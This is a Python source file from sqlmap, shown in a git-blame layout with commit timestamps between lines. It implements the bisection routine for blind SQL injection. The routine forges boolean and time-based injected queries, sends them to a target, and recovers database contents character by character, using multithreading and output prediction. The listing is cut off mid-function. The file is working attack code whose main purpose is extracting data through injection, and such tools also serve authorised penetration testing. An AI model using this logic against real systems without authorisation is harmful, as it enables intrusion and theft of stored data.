2008-10-15 19:38:22 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
2008-10-15 19:56:32 +04:00
|
|
|
$Id$
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-01-11 18:59:46 +04:00
|
|
|
Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
|
2010-10-15 03:18:29 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
|
|
|
|
import threading
|
|
|
|
import time
|
|
|
|
|
2012-02-22 14:40:11 +04:00
|
|
|
from extra.safe2bin.safe2bin import safecharencode
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.agent import agent
|
2011-01-28 19:36:09 +03:00
|
|
|
from lib.core.common import Backend
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.common import dataToStdout
|
2012-02-21 15:44:48 +04:00
|
|
|
from lib.core.common import decodeHexValue
|
2011-01-19 18:25:48 +03:00
|
|
|
from lib.core.common import decodeIntToUnicode
|
2011-01-05 13:25:07 +03:00
|
|
|
from lib.core.common import filterControlChars
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.common import getCharset
|
2012-02-10 14:24:48 +04:00
|
|
|
from lib.core.common import getCounter
|
2010-05-27 20:45:09 +04:00
|
|
|
from lib.core.common import goGoodSamaritan
|
2010-05-26 13:48:20 +04:00
|
|
|
from lib.core.common import getPartRun
|
2012-02-24 17:07:20 +04:00
|
|
|
from lib.core.common import hashDBRetrieve
|
|
|
|
from lib.core.common import hashDBWrite
|
2012-02-10 14:24:48 +04:00
|
|
|
from lib.core.common import incrementCounter
|
2010-01-15 19:06:59 +03:00
|
|
|
from lib.core.common import safeStringFormat
|
2012-02-24 14:57:23 +04:00
|
|
|
from lib.core.common import setFormatterPrependFlag
|
2011-06-08 18:35:23 +04:00
|
|
|
from lib.core.common import singleTimeWarnMessage
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
2010-06-17 15:38:32 +04:00
|
|
|
from lib.core.data import queries
|
2010-11-08 12:20:02 +03:00
|
|
|
from lib.core.enums import DBMS
|
2010-12-08 16:04:48 +03:00
|
|
|
from lib.core.enums import PAYLOAD
|
2008-12-04 20:40:03 +03:00
|
|
|
from lib.core.exception import sqlmapThreadException
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.progress import ProgressBar
|
2010-12-10 14:32:46 +03:00
|
|
|
from lib.core.settings import CHAR_INFERENCE_MARK
|
2010-12-11 13:52:04 +03:00
|
|
|
from lib.core.settings import INFERENCE_BLANK_BREAK
|
2011-01-17 13:15:19 +03:00
|
|
|
from lib.core.settings import INFERENCE_UNKNOWN_CHAR
|
2011-01-31 18:00:41 +03:00
|
|
|
from lib.core.settings import INFERENCE_GREATER_CHAR
|
|
|
|
from lib.core.settings import INFERENCE_EQUALS_CHAR
|
2011-01-31 19:07:23 +03:00
|
|
|
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
|
2011-08-16 10:50:20 +04:00
|
|
|
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
|
2012-02-17 18:22:48 +04:00
|
|
|
from lib.core.settings import PARTIAL_VALUE_MARKER
|
2011-07-03 02:48:56 +04:00
|
|
|
from lib.core.threads import getCurrentThreadData
|
|
|
|
from lib.core.threads import runThreads
|
2008-10-15 19:38:22 +04:00
|
|
|
from lib.core.unescaper import unescaper
|
|
|
|
from lib.request.connect import Connect as Request
|
2010-02-04 20:45:56 +03:00
|
|
|
|
2011-02-27 15:14:13 +03:00
|
|
|
def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False):
|
2008-10-15 19:38:22 +04:00
|
|
|
"""
|
|
|
|
Bisection algorithm that can be used to perform blind SQL injection
|
|
|
|
on an affected host
|
|
|
|
"""
|
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
partialValue = u""
|
|
|
|
finalValue = None
|
|
|
|
abortedFlag = False
|
2009-04-22 15:48:07 +04:00
|
|
|
asciiTbl = getCharset(charsetType)
|
2010-12-09 02:52:31 +03:00
|
|
|
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
|
2012-02-24 18:54:10 +04:00
|
|
|
retVal = hashDBRetrieve(expression, checkConf=True)
|
2008-12-04 20:40:03 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if retVal:
|
|
|
|
if PARTIAL_VALUE_MARKER in retVal:
|
|
|
|
partialValue = retVal.replace(PARTIAL_VALUE_MARKER, "")
|
|
|
|
dataToStdout("[%s] [INFO] resuming partial value: '%s'\r\n" % (time.strftime("%X"), safecharencode(partialValue)))
|
|
|
|
else:
|
|
|
|
dataToStdout("[%s] [INFO] resumed: %s\r\n" % (time.strftime("%X"), safecharencode(retVal)))
|
|
|
|
return 0, retVal
|
|
|
|
|
|
|
|
try:
|
|
|
|
# Set kb.partRun in case "common prediction" feature (a.k.a. "good
|
|
|
|
# samaritan") is used
|
|
|
|
kb.partRun = getPartRun() if conf.predictOutput else None
|
|
|
|
|
|
|
|
if partialValue:
|
|
|
|
firstChar = len(partialValue)
|
|
|
|
elif "LENGTH(" in expression or "LEN(" in expression:
|
|
|
|
firstChar = 0
|
|
|
|
elif dump and conf.firstChar is not None and ( isinstance(conf.firstChar, int) or ( isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit() ) ):
|
|
|
|
firstChar = int(conf.firstChar) - 1
|
|
|
|
elif firstChar is None:
|
|
|
|
firstChar = 0
|
|
|
|
elif ( isinstance(firstChar, basestring) and firstChar.isdigit() ) or isinstance(firstChar, int):
|
|
|
|
firstChar = int(firstChar) - 1
|
|
|
|
|
|
|
|
if "LENGTH(" in expression or "LEN(" in expression:
|
|
|
|
lastChar = 0
|
|
|
|
elif dump and conf.lastChar is not None and ( isinstance(conf.lastChar, int) or ( isinstance(conf.lastChar, basestring) and conf.lastChar.isdigit() ) ):
|
|
|
|
lastChar = int(conf.lastChar)
|
|
|
|
elif lastChar in ( None, "0" ):
|
|
|
|
lastChar = 0
|
|
|
|
elif ( isinstance(lastChar, basestring) and lastChar.isdigit() ) or isinstance(lastChar, int):
|
|
|
|
lastChar = int(lastChar)
|
|
|
|
|
|
|
|
if Backend.getDbms():
|
|
|
|
_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
|
|
|
|
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
|
|
|
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
|
|
|
expressionUnescaped = unescaper.unescape(expressionReplaced)
|
|
|
|
else:
|
|
|
|
expressionUnescaped = unescaper.unescape(expression)
|
2009-09-26 03:03:45 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if length and not isinstance(length, int) and length.isdigit():
|
|
|
|
length = int(length)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if length == 0:
|
|
|
|
return 0, ""
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if lastChar > 0 and length > ( lastChar - firstChar ):
|
|
|
|
length = ( lastChar - firstChar )
|
2011-10-28 15:11:55 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
showEta = conf.eta and isinstance(length, int)
|
|
|
|
numThreads = min(conf.threads, length)
|
2010-03-12 17:48:33 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if showEta:
|
|
|
|
progress = ProgressBar(maxValue=length)
|
|
|
|
progressTime = []
|
2011-05-27 12:30:52 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if timeBasedCompare and conf.threads > 1:
|
|
|
|
warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically"
|
|
|
|
singleTimeWarnMessage(warnMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if numThreads > 1:
|
|
|
|
if not timeBasedCompare:
|
|
|
|
debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else ""))
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
else:
|
|
|
|
numThreads = 1
|
2010-04-15 14:08:27 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if conf.threads == 1 and not timeBasedCompare:
|
|
|
|
warnMsg = "running in a single-thread mode. Please consider "
|
|
|
|
warnMsg += "usage of option '--threads' for faster data retrieval"
|
|
|
|
singleTimeWarnMessage(warnMsg)
|
2010-04-15 14:08:27 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if conf.verbose in (1, 2) and not showEta:
|
|
|
|
if isinstance(length, int) and conf.threads > 1:
|
|
|
|
dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth)))
|
|
|
|
dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X"))
|
2010-04-15 13:36:13 +04:00
|
|
|
else:
|
2012-02-24 15:25:56 +04:00
|
|
|
dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X"))
|
2010-04-15 13:36:13 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
hintlock = threading.Lock()
|
2010-04-15 14:08:27 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
def tryHint(idx):
|
|
|
|
hintlock.acquire()
|
|
|
|
hintValue = kb.hintValue
|
|
|
|
hintlock.release()
|
2010-04-15 14:08:27 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if hintValue is not None and len(hintValue) >= idx:
|
|
|
|
if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB, DBMS.DB2):
|
|
|
|
posValue = hintValue[idx-1]
|
|
|
|
else:
|
|
|
|
posValue = ord(hintValue[idx-1])
|
2010-04-15 14:08:27 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
|
|
|
|
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
|
|
|
incrementCounter(kb.technique)
|
2010-04-15 13:36:13 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if result:
|
|
|
|
return hintValue[idx-1]
|
2011-02-01 01:51:14 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
hintlock.acquire()
|
|
|
|
kb.hintValue = None
|
|
|
|
hintlock.release()
|
2011-01-31 19:07:23 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
return None
|
2011-01-31 19:07:23 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
def validateChar(idx, value):
|
|
|
|
"""
|
|
|
|
Used in time-based inference (in case that original and retrieved
|
|
|
|
value are not equal there will be a deliberate delay).
|
|
|
|
"""
|
2010-12-10 14:32:46 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value))
|
|
|
|
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
|
|
|
incrementCounter(kb.technique)
|
2010-04-15 14:08:27 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
return not result
|
2010-04-15 13:36:13 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
def getChar(idx, charTbl=asciiTbl, continuousOrder=True, expand=charsetType is None, shiftTable=None):
|
|
|
|
"""
|
|
|
|
continuousOrder means that distance between each two neighbour's
|
|
|
|
numerical values is exactly 1
|
|
|
|
"""
|
2010-12-11 13:22:18 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
result = tryHint(idx)
|
2010-05-25 17:06:23 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if result:
|
|
|
|
return result
|
2010-12-12 00:17:54 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
originalTbl = list(charTbl)
|
2010-05-31 19:05:29 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if continuousOrder and shiftTable is None:
|
|
|
|
# Used for gradual expanding into unicode charspace
|
|
|
|
shiftTable = [5, 4]
|
2010-05-25 17:06:23 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl:
|
|
|
|
charTbl.remove(ord('\n'))
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if len(charTbl) == 1:
|
|
|
|
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0]))
|
|
|
|
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
|
|
|
incrementCounter(kb.technique)
|
2010-03-18 20:20:54 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if result:
|
|
|
|
return decodeIntToUnicode(charTbl[0])
|
|
|
|
else:
|
|
|
|
return None
|
2010-05-12 15:30:32 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
maxChar = maxValue = charTbl[-1]
|
|
|
|
minChar = minValue = charTbl[0]
|
2008-10-16 18:01:14 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
while len(charTbl) != 1:
|
|
|
|
position = (len(charTbl) >> 1)
|
|
|
|
posValue = charTbl[position]
|
2010-05-31 19:05:29 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if CHAR_INFERENCE_MARK not in payload:
|
|
|
|
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
|
2010-06-17 15:38:32 +04:00
|
|
|
else:
|
2012-02-17 18:22:48 +04:00
|
|
|
# e.g.: ... > '%c' -> ... > ORD(..)
|
|
|
|
markingValue = "'%s'" % CHAR_INFERENCE_MARK
|
|
|
|
unescapedCharValue = unescaper.unescape("'%s'" % decodeIntToUnicode(posValue))
|
|
|
|
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
|
2010-05-31 19:05:29 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
|
|
|
incrementCounter(kb.technique)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if result:
|
|
|
|
minValue = posValue
|
2010-06-17 15:38:32 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if type(charTbl) != xrange:
|
|
|
|
charTbl = charTbl[position:]
|
2010-05-28 14:01:19 +04:00
|
|
|
else:
|
2012-02-17 18:22:48 +04:00
|
|
|
# xrange() - extended virtual charset used for memory/space optimization
|
|
|
|
charTbl = xrange(charTbl[position], charTbl[-1] + 1)
|
|
|
|
else:
|
|
|
|
maxValue = posValue
|
2011-11-22 19:06:51 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if type(charTbl) != xrange:
|
|
|
|
charTbl = charTbl[:position]
|
|
|
|
else:
|
|
|
|
charTbl = xrange(charTbl[0], charTbl[position])
|
2011-08-16 10:50:20 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if len(charTbl) == 1:
|
|
|
|
if continuousOrder:
|
|
|
|
if maxValue == 1:
|
|
|
|
return None
|
2011-11-22 19:06:51 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
# Going beyond the original charset
|
|
|
|
elif minValue == maxChar:
|
|
|
|
# If the original charTbl was [0,..,127] new one
|
|
|
|
# will be [128,..,128*16-1] or from 128 to 2047
|
|
|
|
# and instead of making a HUGE list with all the
|
|
|
|
# elements we use a xrange, which is a virtual
|
|
|
|
# list
|
|
|
|
if expand and shiftTable:
|
|
|
|
charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop())
|
|
|
|
originalTbl = list(charTbl)
|
|
|
|
maxChar = maxValue = charTbl[-1]
|
|
|
|
minChar = minValue = charTbl[0]
|
|
|
|
else:
|
|
|
|
return None
|
|
|
|
else:
|
|
|
|
retVal = minValue + 1
|
|
|
|
|
|
|
|
if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload):
|
|
|
|
if timeBasedCompare and not validateChar(idx, retVal):
|
|
|
|
if not kb.originalTimeDelay:
|
|
|
|
kb.originalTimeDelay = conf.timeSec
|
|
|
|
|
|
|
|
if (conf.timeSec - kb.originalTimeDelay) < MAX_TIME_REVALIDATION_STEPS:
|
|
|
|
errMsg = "invalid character detected. retrying.."
|
|
|
|
logger.error(errMsg)
|
|
|
|
|
|
|
|
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
conf.timeSec += 1
|
|
|
|
|
|
|
|
if kb.adjustTimeDelay:
|
|
|
|
dbgMsg = "turning off auto-adjustment mechanism"
|
|
|
|
logger.debug(dbgMsg)
|
|
|
|
kb.adjustTimeDelay = False
|
|
|
|
return getChar(idx, originalTbl, continuousOrder, expand, shiftTable)
|
|
|
|
else:
|
|
|
|
errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode(retVal)
|
|
|
|
logger.error(errMsg)
|
|
|
|
conf.timeSec = kb.originalTimeDelay
|
|
|
|
return decodeIntToUnicode(retVal)
|
2011-08-16 10:50:20 +04:00
|
|
|
else:
|
2011-08-16 11:01:14 +04:00
|
|
|
return decodeIntToUnicode(retVal)
|
2011-01-31 19:07:23 +03:00
|
|
|
else:
|
2012-02-17 18:22:48 +04:00
|
|
|
return None
|
|
|
|
else:
|
|
|
|
if minValue == maxChar or maxValue == minChar:
|
2010-12-11 13:22:18 +03:00
|
|
|
return None
|
2010-05-31 19:05:29 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
# If we are working with non-continuous elements, set
|
|
|
|
# both minValue and character afterwards are possible
|
|
|
|
# candidates
|
|
|
|
for retVal in (originalTbl[originalTbl.index(minValue)], originalTbl[originalTbl.index(minValue) + 1]):
|
|
|
|
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal))
|
|
|
|
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
|
|
|
incrementCounter(kb.technique)
|
2010-05-31 19:05:29 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if result:
|
|
|
|
return decodeIntToUnicode(retVal)
|
2010-05-31 19:05:29 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
return None
|
2010-02-04 20:45:56 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
def etaProgressUpdate(charTime, index):
|
|
|
|
if len(progressTime) <= ( (length * 3) / 100 ):
|
|
|
|
eta = 0
|
|
|
|
else:
|
|
|
|
midTime = sum(progressTime) / len(progressTime)
|
|
|
|
midTimeWithLatest = (midTime + charTime) / 2
|
|
|
|
eta = midTimeWithLatest * (length - index) / conf.threads
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
progressTime.append(charTime)
|
|
|
|
progress.update(index)
|
|
|
|
progress.draw(eta)
|
2010-02-04 20:45:56 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
# Go multi-threading (--threads > 1)
|
|
|
|
if conf.threads > 1 and isinstance(length, int) and length > 1:
|
|
|
|
value = []
|
|
|
|
threadData = getCurrentThreadData()
|
2011-07-03 02:48:56 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
threadData.shared.value = [ None ] * length
|
|
|
|
threadData.shared.index = [ firstChar ] # As list for python nested function scoping
|
|
|
|
threadData.shared.start = firstChar
|
2011-07-03 02:48:56 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
try:
|
|
|
|
def blindThread():
|
|
|
|
threadData = getCurrentThreadData()
|
2011-07-03 02:48:56 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
while kb.threadContinue:
|
|
|
|
kb.locks.index.acquire()
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if threadData.shared.index[0] >= length:
|
|
|
|
kb.locks.index.release()
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
return
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
threadData.shared.index[0] += 1
|
|
|
|
curidx = threadData.shared.index[0]
|
|
|
|
kb.locks.index.release()
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if kb.threadContinue:
|
|
|
|
charStart = time.time()
|
|
|
|
val = getChar(curidx)
|
|
|
|
if val is None:
|
|
|
|
val = INFERENCE_UNKNOWN_CHAR
|
|
|
|
else:
|
|
|
|
break
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
kb.locks.value.acquire()
|
|
|
|
threadData.shared.value[curidx - 1] = val
|
|
|
|
currentValue = list(threadData.shared.value)
|
|
|
|
kb.locks.value.release()
|
2008-12-04 20:40:03 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if kb.threadContinue:
|
|
|
|
if showEta:
|
|
|
|
etaProgressUpdate(time.time() - charStart, threadData.shared.index[0])
|
|
|
|
elif conf.verbose >= 1:
|
|
|
|
startCharIndex = 0
|
|
|
|
endCharIndex = 0
|
2010-03-25 19:26:50 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
for i in xrange(length):
|
|
|
|
if currentValue[i] is not None:
|
|
|
|
endCharIndex = max(endCharIndex, i)
|
2010-03-25 19:26:50 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
output = ''
|
2010-03-25 19:26:50 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if endCharIndex > conf.progressWidth:
|
|
|
|
startCharIndex = endCharIndex - conf.progressWidth
|
2010-03-25 19:26:50 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
count = threadData.shared.start
|
2010-03-25 19:26:50 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
for i in xrange(startCharIndex, endCharIndex + 1):
|
|
|
|
output += '_' if currentValue[i] is None else currentValue[i]
|
2010-03-22 20:38:19 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
for i in xrange(length):
|
|
|
|
count += 1 if currentValue[i] is not None else 0
|
2010-03-22 20:38:19 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if startCharIndex > 0:
|
|
|
|
output = '..' + output[2:]
|
2010-03-22 20:38:19 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length-1):
|
|
|
|
output = output[:-2] + '..'
|
2010-03-22 20:38:19 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if conf.verbose in (1, 2) and not showEta:
|
|
|
|
output += '_' * (min(length, conf.progressWidth) - len(output))
|
|
|
|
status = ' %d/%d (%d%s)' % (count, length, round(100.0*count/length), '%')
|
|
|
|
output += status if count != length else " "*len(status)
|
2011-01-12 00:46:21 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output)))
|
2008-12-04 20:40:03 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
runThreads(numThreads, blindThread, startThreadMsg=False)
|
2010-07-19 12:37:45 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
except KeyboardInterrupt:
|
|
|
|
abortedFlag = True
|
2010-07-19 12:37:45 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
finally:
|
|
|
|
value = map(lambda _: partialValue[_] if _ < len(partialValue) else threadData.shared.value[_], xrange(length))
|
2011-06-17 16:50:28 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
infoMsg = None
|
2010-03-11 14:20:52 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
# If we have got one single character not correctly fetched it
|
|
|
|
# can mean that the connection to the target url was lost
|
|
|
|
if None in value:
|
|
|
|
partialValue = "".join(_ for _ in value[:value.index(None)])
|
2012-01-05 18:45:05 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if partialValue:
|
|
|
|
infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), filterControlChars(partialValue))
|
|
|
|
else:
|
|
|
|
finalValue = "".join(value)
|
|
|
|
infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue))
|
2010-05-27 20:45:09 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if conf.verbose in (1, 2) and not showEta and infoMsg:
|
|
|
|
dataToStdout(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
# No multi-threading (--threads = 1)
|
2008-12-04 20:40:03 +03:00
|
|
|
else:
|
2012-02-17 18:22:48 +04:00
|
|
|
index = firstChar
|
|
|
|
|
|
|
|
while True:
|
|
|
|
index += 1
|
|
|
|
charStart = time.time()
|
|
|
|
|
|
|
|
# Common prediction feature (a.k.a. "good samaritan")
|
|
|
|
# NOTE: to be used only when multi-threading is not set for
|
|
|
|
# the moment
|
|
|
|
if conf.predictOutput and len(partialValue) > 0 and kb.partRun is not None:
|
|
|
|
val = None
|
|
|
|
commonValue, commonPattern, commonCharset, otherCharset = goGoodSamaritan(partialValue, asciiTbl)
|
|
|
|
|
|
|
|
# If there is one single output in common-outputs, check
|
|
|
|
# it via equal against the query output
|
|
|
|
if commonValue is not None:
|
|
|
|
# One-shot query containing equals commonValue
|
|
|
|
testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False)
|
|
|
|
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
|
|
|
|
query = agent.suffixQuery(query)
|
|
|
|
result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
|
|
|
|
incrementCounter(kb.technique)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
# Did we have luck?
|
|
|
|
if result:
|
|
|
|
if showEta:
|
|
|
|
etaProgressUpdate(time.time() - charStart, len(commonValue))
|
|
|
|
elif conf.verbose in (1, 2):
|
|
|
|
dataToStdout(commonValue[index-1:])
|
|
|
|
|
|
|
|
finalValue = commonValue
|
|
|
|
|
|
|
|
break
|
|
|
|
|
|
|
|
# If there is a common pattern starting with partialValue,
|
|
|
|
# check it via equal against the substring-query output
|
|
|
|
if commonPattern is not None:
|
|
|
|
# Substring-query containing equals commonPattern
|
|
|
|
subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern))
|
|
|
|
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
|
|
|
|
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
|
|
|
|
query = agent.suffixQuery(query)
|
|
|
|
result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
|
|
|
|
incrementCounter(kb.technique)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
# Did we have luck?
|
|
|
|
if result:
|
|
|
|
val = commonPattern[index-1:]
|
|
|
|
index += len(val)-1
|
|
|
|
|
|
|
|
# Otherwise if there is no commonValue (single match from
|
|
|
|
# txt/common-outputs.txt) and no commonPattern
|
|
|
|
# (common pattern) use the returned common charset only
|
|
|
|
# to retrieve the query output
|
|
|
|
if not val and commonCharset:
|
|
|
|
val = getChar(index, commonCharset, False)
|
|
|
|
|
|
|
|
# If we had no luck with commonValue and common charset,
|
|
|
|
# use the returned other charset
|
|
|
|
if not val:
|
|
|
|
val = getChar(index, otherCharset, otherCharset == asciiTbl)
|
|
|
|
else:
|
|
|
|
val = getChar(index, asciiTbl)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if val is None or ( lastChar > 0 and index > lastChar ):
|
|
|
|
finalValue = partialValue
|
|
|
|
break
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if kb.data.processChar:
|
|
|
|
val = kb.data.processChar(val)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
partialValue += val
|
2010-11-02 23:51:55 +03:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if showEta:
|
|
|
|
etaProgressUpdate(time.time() - charStart, index)
|
|
|
|
